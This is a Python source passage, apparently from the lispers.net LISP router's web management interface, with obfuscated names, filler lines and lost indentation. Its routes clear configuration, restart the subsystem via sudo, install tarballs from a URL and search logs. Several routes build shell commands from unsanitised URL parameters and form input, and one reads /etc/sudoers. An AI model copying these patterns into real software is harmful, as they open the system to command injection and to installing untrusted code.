if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
@ bottle . route ( '/lisp/clear/conf/verify' )
def ii1Ii1IiIIi ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 83 - 83: I11i / I1ii11iIi11i
if 34 - 34: I1IiiI * Oo0Ooo * I1Ii111 / OoO0O00 * I11i / iIii1I11I1II1
o00 = "<br>Are you sure you want to clear the configuration?"
o00 = lisp . lisp_print_sans ( o00 )
if 74 - 74: Oo0Ooo / i11iIiiIii - II111iiii * o0oOOo0O0Ooo
IIi1IIIIi = lisp . lisp_button ( "yes" , "/lisp/clear/conf" )
OOOoO = lisp . lisp_button ( "cancel" , "/lisp" )
o00 += IIi1IIIIi + OOOoO + "<br>"
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 14 - 14: I11i . iIii1I11I1II1 . OoooooooOO . II111iiii / o0oOOo0O0Ooo
if 21 - 21: i11iIiiIii / i1IIi + I1IiiI * OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
if 68 - 68: Oo0Ooo + i11iIiiIii
def Oo0oOooo000OO ( ) :
o0o = ""
if 98 - 98: o0oOOo0O0Ooo + O0 % i1IIi - OOooOOo + Oo0Ooo
for OoOo000oOo0oo in [ "443" , "-8080" , "8080" ] :
oO0O = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep' . format ( OoOo000oOo0oo )
o00 = commands . getoutput ( oO0O )
if ( o00 == "" ) : continue
if 86 - 86: OoOoOO00 . iIii1I11I1II1 - OoO0O00
o00 = o00 . split ( "\n" ) [ 0 ]
o00 = o00 . split ( " " )
if ( o00 [ - 2 ] == "lisp-core.pyo" and o00 [ - 1 ] == OoOo000oOo0oo ) : o0o = OoOo000oOo0oo
break
if 56 - 56: O0
return ( o0o )
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
if 23 - 23: oO0o - OOooOOo + I11i
if 12 - 12: I1IiiI / ooOoO0o % o0oOOo0O0Ooo / i11iIiiIii % OoooooooOO
if 15 - 15: iIii1I11I1II1 % OoooooooOO - Oo0Ooo * Ii1I + I11i
if 11 - 11: iII111i * Ii1I - OoOoOO00
if 66 - 66: OoOoOO00 . i11iIiiIii - iII111i * o0oOOo0O0Ooo + OoooooooOO * I1ii11iIi11i
if 74 - 74: Oo0Ooo
@ bottle . route ( '/lisp/restart' )
def OO000o00 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 46 - 46: OoO0O00
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
if 68 - 68: OoooooooOO % II111iiii
if 26 - 26: II111iiii % i11iIiiIii % iIii1I11I1II1 % I11i * I11i * I1ii11iIi11i
OOoO = commands . getoutput ( "egrep requiretty /etc/sudoers" ) . split ( " " )
if ( OOoO [ - 1 ] == "requiretty" and OOoO [ 0 ] == "Defaults" ) :
o00 = "Need to remove 'requiretty' from /etc/sudoers"
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 24 - 24: II111iiii % I1Ii111 - ooOoO0o + I1IiiI * I1ii11iIi11i
if 2 - 2: Ii1I - IiII
lisp . lprint ( lisp . bold ( "LISP subsystem restart request received" , False ) )
if 83 - 83: oO0o % o0oOOo0O0Ooo % Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
if 71 - 71: OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
o0o = Oo0oOooo000OO ( )
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if 45 - 45: IiII
oO0O = "sleep 1; sudo ./RESTART-LISP {}" . format ( o0o )
thread . start_new_thread ( os . system , ( oO0O , ) )
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
o00 = lisp . lisp_print_sans ( "Restarting LISP subsystem ..." )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 78 - 78: iIii1I11I1II1 + I11i - Ii1I * I1Ii111 - OoooooooOO % OoOoOO00
if 34 - 34: O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
if 68 - 68: oO0o - I1ii11iIi11i % O0 % I1Ii111
if 11 - 11: O0 / OoO0O00 % OOooOOo + o0oOOo0O0Ooo + iIii1I11I1II1
if 40 - 40: ooOoO0o - OOooOOo . Ii1I * Oo0Ooo % I1Ii111
if 56 - 56: i11iIiiIii . o0oOOo0O0Ooo - I1IiiI * I11i
@ bottle . route ( '/lisp/restart/verify' )
def oOOoo0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 20 - 20: IiII % IiII
if 94 - 94: o0oOOo0O0Ooo + O0 / I11i . I1IiiI + OOooOOo . iIii1I11I1II1
o00 = "<br>Are you sure you want to restart the LISP subsystem?"
o00 = lisp . lisp_print_sans ( o00 )
if 62 - 62: OoOoOO00 / I1IiiI - I1ii11iIi11i - I1IiiI + i11iIiiIii + i1IIi
IIi1IIIIi = lisp . lisp_button ( "yes" , "/lisp/restart" )
OOOoO = lisp . lisp_button ( "cancel" , "/lisp" )
o00 += IIi1IIIIi + OOOoO + "<br>"
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if 8 - 8: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
@ bottle . route ( '/lisp/install' , method = "post" )
def iiIii1I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 47 - 47: ooOoO0o . I11i / o0oOOo0O0Ooo
if 83 - 83: o0oOOo0O0Ooo / OOooOOo / OOooOOo + o0oOOo0O0Ooo * I1Ii111 + o0oOOo0O0Ooo
IIIIiii = bottle . request . forms . get ( "image_url" )
if ( IIIIiii . find ( "lispers.net" ) == - 1 or IIIIiii . find ( ".tgz" ) == - 1 ) :
oO0oIIIii1iiIi = "Invalid install request for file {}" . format ( IIIIiii )
lisp . lprint ( lisp . bold ( oO0oIIIii1iiIi , False ) )
o00 = lisp . lisp_print_sans ( "Invalid lispers.net tarball file name" )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 63 - 63: I1ii11iIi11i
if 6 - 6: ooOoO0o / I1ii11iIi11i
if ( lisp . lisp_is_ubuntu ( ) ) :
oO0O = "python lisp-get-bits.pyo {} force 2>&1 > /dev/null" . format ( IIIIiii )
else :
oO0O = "python lisp-get-bits.pyo {} force >& /dev/null" . format ( IIIIiii )
if 57 - 57: I11i
ooo0O = os . system ( oO0O )
if 67 - 67: OoO0O00 . ooOoO0o
oO00oOo0OOO = IIIIiii . split ( "/" ) [ - 1 ]
if 23 - 23: i1IIi . o0oOOo0O0Ooo * OoO0O00
if ( os . path . exists ( oO00oOo0OOO ) ) :
iIi1IiI = IIIIiii . split ( "release-" ) [ 1 ]
iIi1IiI = iIi1IiI . split ( ".tgz" ) [ 0 ]
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
o00 = "Install completed for release {}" . format ( iIi1IiI )
o00 = lisp . lisp_print_sans ( o00 )
if 53 - 53: Ii1I % Oo0Ooo
o00 += "<br><br>" + lisp . lisp_button ( "restart LISP subsystem" ,
"/lisp/restart/verify" ) + "<br>"
else :
oO0oIIIii1iiIi = lisp . lisp_print_cour ( IIIIiii )
o00 = "Install failed for file {}" . format ( oO0oIIIii1iiIi )
o00 = lisp . lisp_print_sans ( o00 )
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
oO0oIIIii1iiIi = "Install request for file {} {}" . format ( IIIIiii ,
"succeeded" if ( ooo0O == 0 ) else "failed" )
lisp . lprint ( lisp . bold ( oO0oIIIii1iiIi , False ) )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 12 - 12: OOooOOo
if 69 - 69: OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
@ bottle . route ( '/lisp/install/image' )
def O0O00OOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 66 - 66: i11iIiiIii / o0oOOo0O0Ooo - OoooooooOO / i1IIi . i11iIiiIii
if 16 - 16: Oo0Ooo % I1ii11iIi11i + I11i - O0 . iII111i / I1Ii111
oO0oIIIii1iiIi = lisp . lisp_print_sans ( "<br>Enter lispers.net tarball URL:" )
o00 = '''
<form action="/lisp/install" method="post" style="display: inline;">
{}
<input type="text" name="image_url" size="75" required/>
<input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
</form><br>''' . format ( oO0oIIIii1iiIi )
if 35 - 35: oO0o / I1Ii111 / II111iiii - iIii1I11I1II1 + II111iiii . I1Ii111
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 81 - 81: iII111i * OOooOOo - I1ii11iIi11i * Ii1I % OoOoOO00 * OoOoOO00
if 59 - 59: iIii1I11I1II1
if 7 - 7: OOooOOo * I1IiiI / o0oOOo0O0Ooo * i11iIiiIii
if 84 - 84: OOooOOo . iII111i
if 8 - 8: Oo0Ooo + II111iiii * OOooOOo * OoOoOO00 * I11i / IiII
if 21 - 21: oO0o / OoooooooOO
if 11 - 11: OOooOOo % Ii1I - i11iIiiIii - oO0o + ooOoO0o + IiII
if 87 - 87: I1Ii111 * i1IIi / I1ii11iIi11i
@ bottle . route ( '/lisp/log/flows' )
def IIII1i1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 70 - 70: i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
os . system ( "touch ./log-flows" )
if 62 - 62: i1IIi + Oo0Ooo % IiII
o00 = lisp . lisp_print_sans ( "Flow data appended to file " )
iIi = "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>"
o00 += lisp . lisp_print_cour ( iIi )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 10 - 10: OoO0O00 / Oo0Ooo
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
if 57 - 57: O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
@ bottle . route ( '/lisp/search/log/<name>/<num>/<keyword>' )
def iII1Iii1I11i ( name = "" , num = "" , keyword = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 17 - 17: O0
if 88 - 88: Oo0Ooo . O0 % OoooooooOO / OOooOOo
Oo0O0 = "tail -n {} logs/{}.log | egrep -B10 -A10 {}" . format ( num , name ,
keyword )
o00 = commands . getoutput ( Oo0O0 )
if 89 - 89: II111iiii / oO0o
if ( o00 ) :
IIo0OoO00 = o00 . count ( keyword )
o00 = lisp . convert_font ( o00 )
o00 = o00 . replace ( "--\n--\n" , "--\n" )
o00 = o00 . replace ( "\n" , "<br>" )
o00 = o00 . replace ( "--<br>" , "<hr>" )
o00 = "Found <b>{}</b> occurences<hr>" . format ( IIo0OoO00 ) + o00
else :
o00 = "Keyword {} not found" . format ( keyword )
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
iIi11ii = "<font color='blue'><b>{}</b>" . format ( keyword )
o00 = o00 . replace ( keyword , iIi11ii )
o00 = o00 . replace ( keyword , keyword + "</font>" )
if 50 - 50: Ii1I / OoOoOO00 * Ii1I
o00 = lisp . lisp_print_cour ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
@ bottle . post ( '/lisp/search/log/<name>/<num>' )
def o00oo0000 ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 44 - 44: Oo0Ooo % iIii1I11I1II1
if 90 - 90: II111iiii + OoooooooOO % OoooooooOO
I11Ii = bottle . request . forms . get ( "keyword" )
return ( iII1Iii1I11i ( name , num , I11Ii ) )
if 16 - 16: Oo0Ooo / i11iIiiIii
if 64 - 64: i11iIiiIii / Ii1I * i1IIi
if 73 - 73: Oo0Ooo - OoOoOO00 - oO0o - I1IiiI
if 65 - 65: o0oOOo0O0Ooo
if 7 - 7: IiII . OoOoOO00 / I1ii11iIi11i . OOooOOo * I11i - II111iiii
if 37 - 37: I1Ii111 . OoOoOO00 / O0 * iII111i
if 7 - 7: OoO0O00 * I11i + II111iiii % i11iIiiIii
@ bottle . route ( '/lisp/show/log/<name>/<num>' )
def i1i1IiIiIi1Ii ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 64 - 64: OOooOOo + OoooooooOO * OoooooooOO
if 41 - 41: ooOoO0o . Oo0Ooo + I1IiiI
if 100 - 100: Ii1I + OoO0O00
if 73 - 73: i1IIi - I1Ii111 % ooOoO0o / OoO0O00
if 40 - 40: I1ii11iIi11i * ooOoO0o - I1IiiI / IiII / i11iIiiIii
if ( num == "" ) : num = 100
if 83 - 83: I1ii11iIi11i / I1Ii111 - i11iIiiIii . iIii1I11I1II1 + Oo0Ooo
ooO0000o00O = '''
<form action="/lisp/search/log/{}/{}" method="post">
<i>Keyword search:</i>
<input type="text" name="keyword" />
<input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
</form><hr>
''' . format ( name , num )
if 91 - 91: I11i / O0 - Ii1I . I1IiiI
if ( os . path . exists ( "logs/{}.log" . format ( name ) ) ) :
o00 = commands . getoutput ( "tail -n {} logs/{}.log" . format ( num , name ) )
o00 = lisp . convert_font ( o00 )
o00 = o00 . replace ( "\n" , "<br>" )
o00 = ooO0000o00O + lisp . lisp_print_cour ( o00 )
else :
o0oOOo0OooOo = lisp . lisp_print_sans ( "File" )
o0 = lisp . lisp_print_cour ( "logs/{}.log" . format ( name ) )
iIiiIiiIi = lisp . lisp_print_sans ( "does not exist" )
o00 = "{} {} {}" . format ( o0oOOo0OooOo , o0 , iIiiIiiIi )
if 40 - 40: o0oOOo0O0Ooo
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 78 - 78: iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
if 6 - 6: IiII * i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / i1IIi
if 53 - 53: I11i + iIii1I11I1II1
if 70 - 70: I1ii11iIi11i
@ bottle . route ( '/lisp/debug/<name>' )
def oo0O ( name = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 6 - 6: Oo0Ooo . IiII / IiII - i11iIiiIii
if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if ( name == "disable%all" ) :
O000oo = lispconfig . lisp_get_clause_for_api ( "lisp debug" )
if ( O000oo [ 0 ] . has_key ( "lisp debug" ) ) :
i1 = [ ]
for OO0 in O000oo [ 0 ] [ "lisp debug" ] :
Ooo0 = OO0 . keys ( ) [ 0 ]
i1 . append ( { Ooo0 : "no" } )
if 91 - 91: i1IIi - iIii1I11I1II1
i1 = { "lisp debug" : i1 }
lispconfig . lisp_put_clause_for_api ( i1 )
if 55 - 55: I1IiiI * o0oOOo0O0Ooo % ooOoO0o . iIii1I11I1II1 * I1Ii111
if 92 - 92: I1Ii111 - iIii1I11I1II1
O000oo = lispconfig . lisp_get_clause_for_api ( "lisp xtr-parameters" )
if ( O000oo [ 0 ] . has_key ( "lisp xtr-parameters" ) ) :
i1 = [ ]
for OO0 in O000oo [ 0 ] [ "lisp xtr-parameters" ] :
Ooo0 = OO0 . keys ( ) [ 0 ]
if ( Ooo0 in [ "data-plane-logging" , "flow-logging" ] ) :
i1 . append ( { Ooo0 : "no" } )
else :
i1 . append ( { Ooo0 : OO0 [ Ooo0 ] } )
if 32 - 32: Ii1I % OoO0O00 * OoO0O00 + IiII * II111iiii * Ii1I
if 11 - 11: oO0o % II111iiii
i1 = { "lisp xtr-parameters" : i1 }
lispconfig . lisp_put_clause_for_api ( i1 )
if 57 - 57: OOooOOo / Oo0Ooo
if 69 - 69: oO0o - Oo0Ooo % IiII
return ( lispconfig . lisp_landing_page ( ) )
if 50 - 50: OoooooooOO
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
name = name . split ( "%" )
Oo = name [ 0 ]
OooOooo = name [ 1 ]
if 40 - 40: OoOoOO00 % OoO0O00
oo0O0o00 = [ "data-plane-logging" , "flow-logging" ]
if 70 - 70: OoO0O00
i1iIi1111 = "lisp xtr-parameters" if ( Oo in oo0O0o00 ) else "lisp debug"
if 13 - 13: OoO0O00
if 37 - 37: Ii1I + I1Ii111 - Oo0Ooo + Ii1I
O000oo = lispconfig . lisp_get_clause_for_api ( i1iIi1111 )
if 92 - 92: OoooooooOO - OoooooooOO * OoO0O00 % I1IiiI
if ( O000oo [ 0 ] . has_key ( i1iIi1111 ) ) :
i1 = { }
for OO0 in O000oo [ 0 ] [ i1iIi1111 ] :
i1 [ OO0 . keys ( ) [ 0 ] ] = OO0 . values ( ) [ 0 ]
if ( i1 . has_key ( Oo ) ) : i1 [ Oo ] = OooOooo
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
i1 = { i1iIi1111 : i1 }
lispconfig . lisp_put_clause_for_api ( i1 )
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
return ( lispconfig . lisp_landing_page ( ) )
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
@ bottle . route ( '/lisp/clear/<name>' )
@ bottle . route ( '/lisp/clear/etr/<etr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/itr/<itr_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>' )
def OOoO00ooO ( name = "" , itr_name = '' , rtr_name = "" , etr_name = "" ,
stats_name = "" ) :
if 12 - 12: ooOoO0o % I1IiiI + oO0o - i1IIi . Ii1I / I1IiiI
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 51 - 51: OOooOOo . I1IiiI
if 73 - 73: OoooooooOO . I1IiiI / I1Ii111 % Ii1I
if 65 - 65: IiII - I1IiiI - Ii1I
if 42 - 42: II111iiii * I1IiiI % i1IIi - Ii1I % IiII
if 36 - 36: i11iIiiIii / oO0o * I1ii11iIi11i * I1ii11iIi11i + Ii1I * I11i
if ( lispconfig . lisp_is_user_superuser ( None ) == False ) :
o00 = lisp . lisp_print_sans ( "Not authorized" )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 32 - 32: OoO0O00
if 50 - 50: ooOoO0o + i1IIi
i11I1iIiII = "clear"
if ( name == "referral" ) :
i11IiIIi11I = "lisp-mr"
o000o0O0Oo00 = "Referral"
elif ( itr_name == "map-cache" ) :
i11IiIIi11I = "lisp-itr"
o000o0O0Oo00 = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
elif ( rtr_name == "map-cache" ) :
i11IiIIi11I = "lisp-rtr"
o000o0O0Oo00 = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
elif ( etr_name == "stats" ) :
i11IiIIi11I = "lisp-etr"
o000o0O0Oo00 = ( "ETR '{}' decapsulation <a href='/lisp/show/" + "database'>stats</a>" ) . format ( stats_name )
if 60 - 60: OoOoOO00
i11I1iIiII += "%" + stats_name
elif ( rtr_name == "stats" ) :
i11IiIIi11I = "lisp-rtr"
o000o0O0Oo00 = ( "RTR '{}' decapsulation <a href='/lisp/show/" + "rtr/map-cache'>stats</a>" ) . format ( stats_name )
if 5 - 5: I1IiiI - I1IiiI - I1IiiI * OoooooooOO
i11I1iIiII += "%" + stats_name
else :
o00 = lisp . lisp_print_sans ( "Invalid command" )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 28 - 28: iIii1I11I1II1 + iIii1I11I1II1
if 28 - 28: oO0o
if 52 - 52: I1IiiI + iIii1I11I1II1
if 71 - 71: O0 / oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
i11I1iIiII = lisp . lisp_command_ipc ( i11I1iIiII , "lisp-core" )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , i11IiIIi11I )
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
I1I1I11Ii = commands . getoutput ( "egrep 'lisp map-cache' ./lisp.config" )
if ( I1I1I11Ii != "" ) :
os . system ( "touch ./lisp.config" )
if 48 - 48: OoooooooOO + oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
o00 = lisp . lisp_print_sans ( "{} cleared" . format ( o000o0O0Oo00 ) )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
@ bottle . route ( '/lisp/show/map-server' )
def II11i1IiIII ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 67 - 67: Oo0Ooo / iII111i * OoooooooOO
if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show map-server" ) )
if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
if 24 - 24: o0oOOo0O0Ooo + ooOoO0o + I11i - iIii1I11I1II1
if 49 - 49: I11i . ooOoO0o * OoOoOO00 % IiII . O0
if 48 - 48: O0 * Ii1I - O0 / Ii1I + OoOoOO00
if 52 - 52: OoO0O00 % Ii1I * II111iiii
if 4 - 4: I11i % O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
@ bottle . route ( '/lisp/show/database' )
def Iiii1iiiIiI1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 27 - 27: Ii1I + I1IiiI * iIii1I11I1II1 . OoooooooOO * OoOoOO00
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show database-mapping" ) )
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
if 29 - 29: O0 . I1Ii111
@ bottle . route ( '/lisp/show/itr/map-cache' )
def OO0o0oO0O000o ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 47 - 47: I1Ii111 - OoO0O00 / Ii1I * OoooooooOO / Ii1I . Oo0Ooo
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show itr-map-cache" ) )
if 34 - 34: ooOoO0o
if 27 - 27: I1Ii111 + OoooooooOO - OoOoOO00
if 15 - 15: oO0o / I11i * O0 . II111iiii - OoO0O00
if 90 - 90: oO0o
if 94 - 94: I11i / I1ii11iIi11i * I1Ii111 - OoOoOO00
if 44 - 44: Ii1I % i11iIiiIii - iII111i * I1ii11iIi11i + Oo0Ooo * OOooOOo
if 41 - 41: O0 * ooOoO0o - OoOoOO00 . Ii1I
@ bottle . route ( '/lisp/show/itr/rloc-probing' )
def oOIIIiI1ii1IIi ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 55 - 55: iII111i - OoO0O00
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show itr-rloc-probing" ) )
if 100 - 100: O0
if 79 - 79: iIii1I11I1II1
if 81 - 81: OOooOOo + iIii1I11I1II1 * I1Ii111 - iIii1I11I1II1 . OOooOOo
if 48 - 48: I11i . OoooooooOO . I1IiiI . OoOoOO00 % I1ii11iIi11i / iII111i
if 11 - 11: i1IIi % OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
@ bottle . post ( '/lisp/show/itr/map-cache/lookup' )
def O0oo0O0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 2 - 2: OoooooooOO . OOooOOo . IiII
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
iI1IiiiIiI1Ii = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( iI1IiiiIiI1Ii ) == False ) :
o00 = "Address '{}' has invalid format" . format ( iI1IiiiIiI1Ii )
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 78 - 78: OoooooooOO / OOooOOo % OoOoOO00 * OoooooooOO
if 68 - 68: oO0o
Oo0O0 = "show itr-map-cache" + "%" + iI1IiiiIiI1Ii
return ( lispconfig . lisp_process_show_command ( O0OOo ,
Oo0O0 ) )
if 29 - 29: iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
@ bottle . route ( '/lisp/show/rtr/map-cache' )
